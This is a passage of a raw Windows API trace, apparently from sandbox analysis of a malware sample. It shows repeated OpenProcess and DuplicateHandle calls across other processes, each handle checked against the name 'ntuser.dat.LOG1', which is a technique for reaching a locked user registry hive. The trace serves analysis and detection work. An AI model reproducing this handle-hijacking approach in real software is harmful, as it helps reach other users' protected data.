[0161.238] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.238] CloseHandle (hObject=0x1e4) returned 1 [0161.238] _wcsicmp (_Str1="\\MAPPING2.MAP", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.238] CloseHandle (hObject=0x194) returned 1 [0161.239] CloseHandle (hObject=0x1e8) returned 1 [0161.239] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.239] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x95c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.239] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.240] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.240] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.240] CloseHandle (hObject=0x1e4) returned 1 [0161.241] _wcsicmp (_Str1="\\MAPPING3.MAP", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.241] CloseHandle (hObject=0x194) returned 1 [0161.241] CloseHandle (hObject=0x1e8) returned 1 [0161.241] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.241] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x960, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.241] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.241] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.242] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.242] CloseHandle (hObject=0x1e4) returned 1 [0161.242] _wcsicmp (_Str1="\\OBJECTS.DATA", _Str2="\\ntuser.dat.LOG1") returned 1 [0161.242] CloseHandle (hObject=0x194) returned 1 [0161.242] CloseHandle (hObject=0x1e8) returned 1 [0161.242] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.242] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x964, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.242] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.243] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.244] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.244] CloseHandle (hObject=0x1e4) returned 1 [0161.244] _wcsicmp (_Str1="\\INDEX.BTR", _Str2="\\ntuser.dat.LOG1") returned -5 [0161.244] CloseHandle (hObject=0x194) returned 1 [0161.244] CloseHandle (hObject=0x1e8) returned 1 [0161.244] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.244] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x9a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.244] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.245] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.246] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.246] CloseHandle (hObject=0x1e4) returned 1 [0161.246] _wcsicmp (_Str1="\\srvsvc", _Str2="\\ntuser.dat.LOG1") returned 5 [0161.246] CloseHandle (hObject=0x194) returned 1 [0161.246] CloseHandle (hObject=0x1e8) returned 1 [0161.246] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.246] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xa70, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.246] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.247] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.248] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.248] CloseHandle (hObject=0x1e4) returned 1 [0161.248] _wcsicmp (_Str1="\\srvsvc", _Str2="\\ntuser.dat.LOG1") returned 5 [0161.248] CloseHandle (hObject=0x194) returned 1 [0161.248] CloseHandle (hObject=0x1e8) returned 1 [0161.248] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.248] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xa78, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.248] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.249] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.250] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.250] CloseHandle (hObject=0x1e4) returned 1 [0161.250] _wcsicmp (_Str1="\\srvsvc", _Str2="\\ntuser.dat.LOG1") returned 5 [0161.250] CloseHandle (hObject=0x194) returned 1 [0161.250] CloseHandle (hObject=0x1e8) returned 1 [0161.250] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.251] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xba0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.251] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.251] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.252] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.252] CloseHandle (hObject=0x1e4) returned 1 [0161.252] _wcsicmp (_Str1="\\FirewallAPI.dll.mui", _Str2="\\ntuser.dat.LOG1") returned -8 [0161.253] CloseHandle (hObject=0x194) returned 1 [0161.253] CloseHandle (hObject=0x1e8) returned 1 [0161.253] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.253] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xe38, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.253] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.254] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.254] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.254] CloseHandle (hObject=0x1e4) returned 1 [0161.254] _wcsicmp (_Str1="\\ReportingEvents.log", _Str2="\\ntuser.dat.LOG1") returned 4 [0161.255] CloseHandle (hObject=0x194) returned 1 [0161.255] CloseHandle (hObject=0x1e8) returned 1 [0161.255] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.255] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xf5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.255] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.259] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.259] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.259] CloseHandle (hObject=0x1e4) returned 1 [0161.259] _wcsicmp (_Str1="\\srvsvc", _Str2="\\ntuser.dat.LOG1") returned 5 [0161.259] CloseHandle (hObject=0x194) returned 1 [0161.259] CloseHandle (hObject=0x1e8) returned 1 [0161.260] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.260] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1064, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.260] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.260] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.261] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.261] CloseHandle (hObject=0x1e4) returned 1 [0161.261] _wcsicmp (_Str1="\\CIMV2SCM EVENT PROVIDER", _Str2="\\ntuser.dat.LOG1") returned -11 [0161.261] CloseHandle (hObject=0x194) returned 1 [0161.262] CloseHandle (hObject=0x1e8) returned 1 [0161.262] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.262] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10cc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.262] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.262] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.263] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.263] CloseHandle (hObject=0x1e4) returned 1 [0161.263] _wcsicmp (_Str1="\\WindowsUpdate.log", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.263] CloseHandle (hObject=0x194) returned 1 [0161.263] CloseHandle (hObject=0x1e8) returned 1 [0161.263] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.263] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10ec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.263] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.264] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.265] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.265] CloseHandle (hObject=0x1e4) returned 1 [0161.265] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\ntuser.dat.LOG1") returned -3 [0161.265] CloseHandle (hObject=0x194) returned 1 [0161.265] CloseHandle (hObject=0x1e8) returned 1 [0161.265] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.265] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1108, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.265] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.266] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.267] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.267] CloseHandle (hObject=0x1e4) returned 1 [0161.267] CloseHandle (hObject=0x194) returned 1 [0161.267] CloseHandle (hObject=0x1e8) returned 1 [0161.267] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.267] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x110c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.267] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.268] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.268] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.269] CloseHandle (hObject=0x1e4) returned 1 [0161.269] CloseHandle (hObject=0x194) returned 1 [0161.269] CloseHandle (hObject=0x1e8) returned 1 [0161.269] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.269] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1178, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.269] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.269] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.270] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.270] CloseHandle (hObject=0x1e4) returned 1 [0161.270] _wcsicmp (_Str1="\\edb.log", _Str2="\\ntuser.dat.LOG1") returned -9 [0161.270] CloseHandle (hObject=0x194) returned 1 [0161.271] CloseHandle (hObject=0x1e8) returned 1 [0161.271] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.271] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1180, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.271] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.271] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.272] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.272] CloseHandle (hObject=0x1e4) returned 1 [0161.272] _wcsicmp (_Str1="\\tmp.edb", _Str2="\\ntuser.dat.LOG1") returned 6 [0161.272] CloseHandle (hObject=0x194) returned 1 [0161.273] CloseHandle (hObject=0x1e8) returned 1 [0161.273] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.273] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x118c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.273] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.273] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.274] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.274] CloseHandle (hObject=0x1e4) returned 1 [0161.274] _wcsicmp (_Str1="\\DataStore.edb", _Str2="\\ntuser.dat.LOG1") returned -10 [0161.274] CloseHandle (hObject=0x194) returned 1 [0161.275] CloseHandle (hObject=0x1e8) returned 1 [0161.275] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.275] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1228, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.275] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.275] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.276] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.276] CloseHandle (hObject=0x1e4) returned 1 [0161.276] _wcsicmp (_Str1="\\wuaueng.dll.mui", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.276] CloseHandle (hObject=0x194) returned 1 [0161.276] CloseHandle (hObject=0x1e8) returned 1 [0161.277] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0161.277] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x1e8 [0161.277] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.277] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.277] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.278] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.278] CloseHandle (hObject=0x1e4) returned 1 [0161.278] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0161.278] CloseHandle (hObject=0x194) returned 1 [0161.279] CloseHandle (hObject=0x1e8) returned 1 [0161.279] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x1e8 [0161.279] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.279] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.280] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.280] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.280] CloseHandle (hObject=0x1e4) returned 1 [0161.280] CloseHandle (hObject=0x194) returned 1 [0161.281] CloseHandle (hObject=0x1e8) returned 1 [0161.281] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x1e8 [0161.281] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xd4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.281] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.281] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.282] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.282] CloseHandle (hObject=0x1e4) returned 1 [0161.282] CloseHandle (hObject=0x194) returned 1 [0161.282] CloseHandle (hObject=0x1e8) returned 1 [0161.283] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x1e8 [0161.283] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x154, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.283] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.283] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.284] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.284] CloseHandle (hObject=0x1e4) returned 1 [0161.284] _wcsicmp (_Str1="\\stdole2.tlb", _Str2="\\ntuser.dat.LOG1") returned 5 [0161.284] CloseHandle (hObject=0x194) returned 1 [0161.285] CloseHandle (hObject=0x1e8) returned 1 [0161.285] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x1e8 [0161.285] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x190, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.285] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.285] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.286] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.286] CloseHandle (hObject=0x1e4) returned 1 [0161.286] _wcsicmp (_Str1="\\es.dll", _Str2="\\ntuser.dat.LOG1") returned -9 [0161.286] CloseHandle (hObject=0x194) returned 1 [0161.286] CloseHandle (hObject=0x1e8) returned 1 [0161.286] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x1e8 [0161.286] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x3c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.286] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.287] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.288] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.288] CloseHandle (hObject=0x1e4) returned 1 [0161.288] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\ntuser.dat.LOG1") returned -3 [0161.288] CloseHandle (hObject=0x194) returned 1 [0161.288] CloseHandle (hObject=0x1e8) returned 1 [0161.288] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0161.289] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.289] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.289] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.290] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.290] CloseHandle (hObject=0x1e4) returned 1 [0161.290] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0161.290] CloseHandle (hObject=0x194) returned 1 [0161.291] CloseHandle (hObject=0x1e8) returned 1 [0161.291] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0161.291] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.291] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.291] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.292] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.292] CloseHandle (hObject=0x1e4) returned 1 [0161.292] CloseHandle (hObject=0x194) returned 1 [0161.292] CloseHandle (hObject=0x1e8) returned 1 [0161.292] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0161.292] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x11c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.292] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.293] WaitForSingleObject (hHandle=0x1e4, 